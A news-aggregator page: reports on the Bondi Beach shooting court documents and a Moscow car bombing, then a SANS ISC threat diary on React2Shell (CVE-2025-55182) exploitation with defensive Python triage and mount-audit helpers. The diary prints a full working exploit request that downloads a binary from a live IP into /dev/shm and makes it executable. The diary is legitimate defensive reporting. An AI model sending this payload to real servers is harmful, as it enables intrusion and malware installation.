Category: Uncategorized

  • Bondi gunmen threw explosives at start of attack and practised shooting weeks before, police allege



    Helen Livingstone, Sydney and Emily Atkinson


    A screenshot from a video found on Naveed Akram’s phone shows his father conducting firearms training, police allege

    The suspected gunmen in the Bondi Beach attack threw explosives at the start of the deadly incident and had practised shooting weeks before as they planned the attack, according to new court documents.

    Fifteen people were killed and dozens more injured when two gunmen opened fire on a Hanukkah celebration on 14 December. Explosives, including a “tennis ball bomb”, failed to detonate, according to the documents.

    Naveed Akram, 24, has been charged with 59 offences, including 15 counts of murder and one of terror. A second gunman – his father, Sajid Akram – was shot dead by police at the scene.

    According to the documents, the pair “meticulously” planned the attack for several months and, two days prior to the shooting, visited Bondi for reconnaissance.


    CCTV shows the Akrams carrying out reconnaissance two days ahead of the Bondi Beach attack, police allege

    Last week, a temporary suppression order was made on the release of the police fact sheet to protect the identities of the survivors. It was revoked on Monday and the documents were published with some redactions.

    Included are the details of several videos tracing the movements of the alleged gunmen in the months, days and hours before the attack.

    One video – taken on one of their mobile phones in October – is described as showing the men sitting in front of an image of an Islamic State group (IS) flag.

    They are heard making statements about their motivations for the attack and condemn “the acts of ‘Zionists’”, police say.

    Naveed Akram is also “recorded appearing to recite, in Arabic, a passage from the Quran”.

    Police said separate footage from October shows the father and son “conducting firearms training in a countryside location”, believed to be in New South Wales. They are seen “firing shotguns and moving in a tactical manner”, officials added.

    CCTV footage from the evening of 12 December is said to show two males “believed to be the accused and his father” in their car next to Bondi Beach.

    “The accused and his father, S Akram, are seen to exit the vehicle and walk along the footbridge, being the same position where they attended two days later and shot at members of the public,” the document states.

    “Police allege that this is evidence of reconnaissance and planning of a terrorist act.”


    A screenshot from CCTV shows the Akrams carrying ‘bulky items’ hours before the attacks, police allege

    At around 02:00 (15:00 GMT) on the day of the attack, two men were captured on CCTV leaving rented accommodation in the Sydney suburb of Campsie “carrying long and bulky items wrapped in blankets”, which they placed into a car.

    The documents note these include two single barrel shotguns, a Beretta rifle, four improvised explosive devices (IEDs) and two IS flags.

    Police say shortly after 17:00 (08:00 GMT), the men were seen leaving the rental. Separate footage captures them arriving at Bondi at 18:50 (09:50 GMT), where they parked and placed the flags on the inside of the front and rear windows.

    They are then seen removing the firearms and IEDs from the car, before walking towards a footbridge, according to the documents.

    It was from this location that police believe they threw the explosives – three pipe bombs and a “tennis ball bomb” – towards the crowd, though none exploded.

    A short time later, they used the firearms to shoot towards the crowd, police say. Fourteen people were killed at the scene. One other died from their injuries later in hospital.

    Sajid Akram was shot and killed during an exchange of fire with New South Wales Police officers.

    Naveed Akram was critically injured by police fire. He was released from hospital on Monday and transferred to a prison.


    Police allege a homemade bomb was found in the boot of the Akrams’ vehicle

    The attack at Bondi Beach sparked calls for tougher restrictions on gun ownership and more efforts to protect the Jewish community from rising antisemitism.

    On Monday, New South Wales state recalled its parliament to debate a raft of new gun and protest laws, proposed in the wake of the shooting.

    Some civil rights groups and pro-gun advocates have raised concerns that the laws will place undue restrictions on firearms and protests.

    NSW Premier Chris Minns said some may feel the changes had “gone too far” but they were needed to keep the community safe.




  • Russian general killed by car bomb in Moscow, officials say



    A Russian general has been killed in a car bombing in Moscow, officials have said.

    Russia’s Investigative Committee said Lt Gen Fanil Sarvarov died on Monday morning after an explosive device planted under a car detonated.

    Sarvarov, 56, was the head of the armed forces’ operational training department, the committee added.

    It said one theory being investigated was that the bomb was planted with the involvement of Ukrainian intelligence services. Ukraine has not commented.

    Investigators have been sent to the scene, in a car park near an apartment block in the south of Russia’s capital.

    Images from the area show a badly damaged white car with the doors blown out, surrounded by other vehicles in a parking lot.

    Since Russia launched its full-scale invasion of Ukraine in February 2022, a number of military officials have been targeted in the Russian capital.

    Gen Yaroslav Moskalik was killed in a car bomb attack in Moscow in April, while Gen Igor Kirillov died in December 2024 when a device hidden in a scooter was detonated remotely.

    A Ukrainian source later told the BBC that Kirillov was killed by Ukraine’s security service, though this was never confirmed on the record. As a matter of policy, Ukraine never officially admits or claims responsibility for targeted attacks.




  • More React2Shell Exploits CVE-2025-55182 – SANS ISC



    Exploits for React2Shell (CVE-2025-55182) remain active. However, at this point, I would think that any servers vulnerable to the “plain” exploit attempts have already been exploited several times. Here is today’s most popular exploit payload:

    ------WebKitFormBoundaryxtherespoopalloverme

    Content-Disposition: form-data; name="0"


    {"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"process.mainModule.require('http').get('http://51.81.104.115/nuts/poop',r=>r.pipe(process.mainModule.require('fs').createWriteStream('/dev/shm/lrt').on('finish',()=>process.mainModule.require('fs').chmodSync('/dev/shm/lrt',0o755))));","_formData":{"get":"$1:constructor:constructor"}}}

    ------WebKitFormBoundaryxtherespoopalloverme

    Content-Disposition: form-data; name="1"


    "$@0"

    ------WebKitFormBoundaryxtherespoopalloverme

    ------WebKitFormBoundaryxtherespoopalloverme--

    To make the key components more readable:

    process.mainModule.require('http').get('http://51.81.104.115/nuts/poop',

    r=>r.pipe(process.mainModule.require('fs').

    createWriteStream('/dev/shm/lrt').on('finish'

    This statement downloads the binary from 51.81.104.115 into a local file, /dev/shm/lrt.

    process.mainModule.require('fs').chmodSync('/dev/shm/lrt',0o755))));

    And then the script is marked as executable. It is unclear whether the script is explicitly executed. The VirusTotal summary is somewhat ambiguous regarding the binary, identifying it as either adware or a miner [1]. Currently, this is the most common exploit variant we see for React2Shell.
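A defender-side triage helper for request bodies shaped like the one above, as an added example that is not part of the original diary: it splits the multipart fields, decodes the JSON, flags `$`-references that walk `__proto__` or `constructor`, and pulls out URLs and drop paths. The names `analyze`, `strings` and `PART_RE`, and the sample body (documentation-range address, inert `_prefix`), are constructed for illustration.

```python
import json
import re

# One form-data part: field name, optional extra headers, blank line, value up to the next boundary.
PART_RE = re.compile(r'name="([^"]*)"[^\n]*\r?\n(?:[^\r\n]+\r?\n)*\r?\n(.*?)\r?\n--', re.S)
URL_RE = re.compile(r"https?://[^\s'\"\\)]+")
# Files under the drop locations named in the diary: /dev/shm, /tmp and /dev.
PATH_RE = re.compile(r"(?<![\w./])/(?:dev/shm|dev|tmp)/[\w.\-]+")
PROTO_SEGMENTS = {"__proto__", "constructor", "prototype"}

# Constructed sample shaped like the request above; "_prefix" is an inert placeholder.
SAMPLE_BODY = r'''------ConstructedBoundary
Content-Disposition: form-data; name="0"

{"then":"$1:__proto__:then","status":"resolved_model","_response":{"_prefix":"GET http://192.0.2.10/x -> /dev/shm/lrt","_formData":{"get":"$1:constructor:constructor"}}}
------ConstructedBoundary
Content-Disposition: form-data; name="1"

"$@0"
------ConstructedBoundary--
'''

def strings(node, path):
    """Yield (path, string) for every string value in a decoded JSON tree."""
    if isinstance(node, str):
        yield path, node
    elif isinstance(node, (dict, list)):
        for key, val in node.items() if isinstance(node, dict) else enumerate(node):
            yield from strings(val, f"{path}.{key}")

def analyze(body):
    """Flag prototype-chain references; collect URLs and drop paths for triage."""
    out = {"proto_refs": [], "urls": [], "drop_paths": []}
    for name, raw in PART_RE.findall(body):
        try:
            doc = json.loads(raw)  # decoding also undoes \uXXXX escapes in the markers
        except ValueError:
            continue
        for path, text in strings(doc, name):
            if text.startswith("$") and PROTO_SEGMENTS & set(text.split(":")[1:]):
                out["proto_refs"].append((path, text))
            out["urls"] += URL_RE.findall(text)
            out["drop_paths"] += PATH_RE.findall(text)
    return out

if __name__ == "__main__":
    print(json.dumps(analyze(SAMPLE_BODY), indent=2))
```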

    Other versions of the exploit use /dev/lrt and /tmp/lrt instead of /dev/shm/lrt to store the malware.

    /dev/shm and /tmp are typically world-writable and should always work. /dev requires root privileges, and these days it is unlikely for a web application to run as root. One recommendation to harden Linux systems is to create /tmp as its own partition and mark it as “noexec” to prevent it from being used as a scratch space to run exploit code. But this is sometimes tough to implement, as “normal” processes run code in /tmp (not pretty, but done ever so often).
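One way to check the hardening point above on a host, as an added example rather than code from the original diary: it reads a /proc/mounts-style table and reports, for each directory the exploit variants write to, which mount holds it, whether the directory is its own mount, and whether that mount carries `noexec`. The function names and the sample mount table are constructed.

```python
import re

DROP_DIRS = ("/dev/shm", "/tmp", "/dev")  # directories the exploit variants write to

# Constructed /proc/mounts excerpt: /tmp has no partition of its own here.
SAMPLE_MOUNTS = """\
/dev/sda1 / ext4 rw,relatime 0 0
devtmpfs /dev devtmpfs rw,nosuid,noexec,relatime 0 0
tmpfs /dev/shm tmpfs rw,nosuid,nodev 0 0
"""

def parse_mounts(text):
    """Return [(mount_point, set_of_options)] from /proc/mounts-style text."""
    mounts = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) >= 4:
            # The kernel writes spaces and similar characters as octal escapes, e.g. \040.
            point = re.sub(r"\\([0-7]{3})", lambda m: chr(int(m.group(1), 8)), fields[1])
            mounts.append((point, set(fields[3].split(","))))
    return mounts

def covering_mount(path, mounts):
    """Pick the mount holding `path`: longest matching mount point, later entries win ties."""
    best = None
    for point, opts in mounts:
        inside = path == point or path.startswith(point.rstrip("/") + "/")
        if inside and (best is None or len(point) >= len(best[0])):
            best = (point, opts)
    return best

def audit(text, dirs=DROP_DIRS):
    """Map each directory to (mount_point, own_mount, noexec)."""
    mounts = parse_mounts(text)
    report = {}
    for d in dirs:
        hit = covering_mount(d, mounts)
        if hit:
            report[d] = (hit[0], hit[0] == d, "noexec" in hit[1])
    return report

if __name__ == "__main__":
    with open("/proc/mounts") as fh:
        for d, (point, own, noexec) in audit(fh.read()).items():
            print(f"{d}: on {point} own_mount={own} noexec={noexec}")
```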

    [1] https://www.virustotal.com/gui/file/895f8dff9cd26424b691a401c92fa7745e693275c38caf6a6aff277eadf2a70b/detection



    Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu



